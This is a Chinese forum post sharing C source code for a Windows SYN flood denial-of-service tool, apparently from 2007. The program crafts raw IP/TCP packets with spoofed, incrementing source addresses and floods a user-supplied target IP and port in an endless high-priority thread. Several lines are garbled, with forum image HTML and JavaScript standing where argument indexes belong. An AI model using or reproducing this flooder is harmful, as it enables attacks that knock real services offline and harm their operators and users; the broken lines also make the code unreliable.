[分享] synflood源码(拒绝服务攻击)

1. #include <winsock2.h>
   
2. #include <Ws2tcpip.h>
   
3. #include <windows.h>
   
4. #include <stdio.h>
   
5. 
   
6. #pragma comment(lib,"ws2_32")
   
7. #pragma comment(lib,"wsock32")
   
8. #define FAKE_IP "201.79.131.18"
   
9. #define SEQ 0x28376839
   
10. #define right "===============Coder Paris-ye====================\n"
    
11. USHORT checksum(USHORT *buffer, int size);
    
12. int flood();
    
13. 
    
14. typedef struct tcphdr
    
15. {
    
16. USHORT th_sport;
    
17. USHORT th_dport;
    
18. unsigned int th_seq;
    
19. unsigned int th_ack;
    
20. unsigned char th_lenres;
    
21. unsigned char th_flag;
    
22. USHORT th_win;
    
23. USHORT th_sum;
    
24. USHORT th_urp;
    
25. }TCP_HEADER;
    
26. 
    
27. typedef struct iphdr
    
28. {
    
29. unsigned char h_verlen;
    
30. unsigned char tos;
    
31. unsigned short total_len;
    
32. unsigned short ident;
    
33. unsigned short frag_and_flags;
    
34. unsigned char ttl;
    
35. unsigned char proto;
    
36. unsigned short checksum;
    
37. unsigned int sourceIP;
    
38. unsigned int destIP;
    
39. }IP_HEADER;
    
40. 
    
41. struct
    
42. {
    
43. unsigned long saddr;
    
44. unsigned long daddr;
    
45. char mbz;
    
46. char ptcl;
    
47. unsigned short tcpl;
    
48. }PSD_HEADER;
    
49. 
    
50. WSADATA wsaData;
    
51. SOCKET sockMain = (SOCKET) NULL;
    
52. int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
    
53. unsigned short activPort=40000;
    
54. struct sockaddr_in sockAddr;
    
55. TCP_HEADER tcpheader;
    
56. IP_HEADER ipheader;
    
57. char sendBuf[128];
    
58. 
    
59. USHORT checksum(USHORT *buffer, int size)
    
60. {
    
61. unsigned long cksum=0;
    
62. while(size >1) {
    
63.   cksum+=*buffer++;
    
64.   size-=sizeof(USHORT);
    
65. }
    
66. if(size) cksum+=*(UCHAR*)buffer;
    
67. cksum=(cksum >> 16)+(cksum&0xffff);
    
68. cksum+=(cksum >>16);
    
69. return (USHORT)(~cksum);
    
70. }
    
71. 
    
72. 
    
73. int main(int argc,char* argv[])
    
74. {
    
75. int portNum=0;
    
76. DWORD dw;
    
77. HANDLE hThread=NULL;
    
78. char putInfo;
    
79. 
    
80. if(argc!=3)
    
81. {
    
82.   printf("%s\n",right);
    
83.   printf("Invalid command,Pls use:\n%s <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
    
84.   return 1;
    
85. }
    
86. if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
    
87.   printf("WSAStartup failed: %d\n",ErrorCode);
    
88.   return 2;
    
89. }
    
90. sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
    
91. if(sockMain==INVALID_SOCKET)
    
92. {
    
93.   printf("Socket failed: %d\n",WSAGetLastError());
    
94. return 3;
    
95. }
    
96. ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
    
97. if(ErrorCode==SOCKET_ERROR)
    
98. {
    
99.   printf("Set sockopt failed: %d\n",WSAGetLastError());
    
100.   return 4;
     
101. }
     
102. ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
     
103. if(ErrorCode==SOCKET_ERROR)
     
104. {
     
105.   printf("Set sockopt time out failed: %d\n",WSAGetLastError());
     
106. return 5;
     
107. }
     
108. portNum=atoi(argv screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://www.stylehack.cn/images/smilies/icon_2.gif');}" alt="" src="http://www.stylehack.cn/images/smilies/icon_2.gif" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>);
     
109. 
     
110. memset(&sockAddr,0,sizeof(sockAddr));
     
111. sockAddr.sin_family=AF_INET;
     
112. sockAddr.sin_addr.s_addr =inet_addr(argv screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://www.stylehack.cn/images/smilies/icon_1.gif');}" alt="" src="http://www.stylehack.cn/images/smilies/icon_1.gif" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>);
     
113. FakeIpNet=inet_addr(FAKE_IP);
     
114. FakeIpHost=ntohl(FakeIpNet);
     
115. 
     
116. ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
     
117. ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
     
118. ipheader.ident = 1;
     
119. ipheader.frag_and_flags = 0;
     
120. ipheader.ttl = 128;
     
121. ipheader.proto = IPPROTO_TCP;
     
122. ipheader.checksum =0;
     
123. ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
     
124. ipheader.destIP = inet_addr(argv screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.style.cursor='hand'; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" onclick="if(!this.resized) {return true;} else {window.open('http://www.stylehack.cn/images/smilies/icon_1.gif');}" alt="" src="http://www.stylehack.cn/images/smilies/icon_1.gif" onload="if(this.width>screen.width*0.7) {this.resized=true; this.width=screen.width*0.7; this.alt='Click here to open new window\nCTRL+Mouse wheel to zoom in/out';}" border=0>);
     
125. 
     
126. tcpheader.th_dport=htons(portNum);
     
127. tcpheader.th_sport = htons(portNum);
     
128. tcpheader.th_seq = htonl(SEQ+SendSEQ);
     
129. tcpheader.th_ack = 0;
     
130. tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
     
131. tcpheader.th_flag = 2;
     
132. tcpheader.th_win = htons(16384);
     
133. tcpheader.th_urp = 0;
     
134. tcpheader.th_sum = 0;
     
135. 
     
136. PSD_HEADER.saddr=ipheader.sourceIP;
     
137. PSD_HEADER.daddr=ipheader.destIP;
     
138. PSD_HEADER.mbz=0;
     
139. PSD_HEADER.ptcl=IPPROTO_TCP;
     
140. PSD_HEADER.tcpl=htons(sizeof(tcpheader));
     
141. printf("%s\n",right);
     
142. hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,Create_SUSPENDED,&dw);
     
143. SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
     
144. ResumeThread(hThread);
     
145. printf("Warning[start]...........\nPress any key to stop!\n");
     
146. putInfo=getchar();
     
147. TerminateThread(hThread,0);
     
148. WSACleanup();
     
149. printf("\nStopd...........\n");
     
150. 
     
151. return 0;
     
152. }
     
153. 
     
154. int flood()
     
155. {
     
156. while(1)
     
157. {
     
158.   if(SendSEQ++==65536) SendSEQ=1;
     
159.   if(activPort++==40010) activPort=1000;
     
160.   ipheader.checksum =0;
     
161.   ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
     
162.   tcpheader.th_seq = htonl(SEQ+SendSEQ);
     
163.   tcpheader.th_sport = htons(activPort);
     
164.   tcpheader.th_sum = 0;
     
165.   PSD_HEADER.saddr=ipheader.sourceIP;
     
166.   memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
     
167.   memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
     
168.   tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
     
169. 
     
170.   memcpy(sendBuf,&ipheader,sizeof(ipheader));
     
171.   memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
     
172.   memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
     
173.   dataSize=sizeof(ipheader)+sizeof(tcpheader);
     
174.   ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
     
175.   memcpy(sendBuf,&ipheader,sizeof(ipheader));
     
176.   ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
     
177.   if(ErrorCode==SOCKET_ERROR)
     
178.   {
     
179.    printf("\nCan't connect this IP!Pls check it.\n");
     
180.    ExitThread(1);
     
181.   }
     
182.   // Sleep(1000);
     
183. }
     
184. return 0;
     
185. }

复制代码

[ 本帖最后由 chinanic 于 2007-4-1 06:13 编辑 ]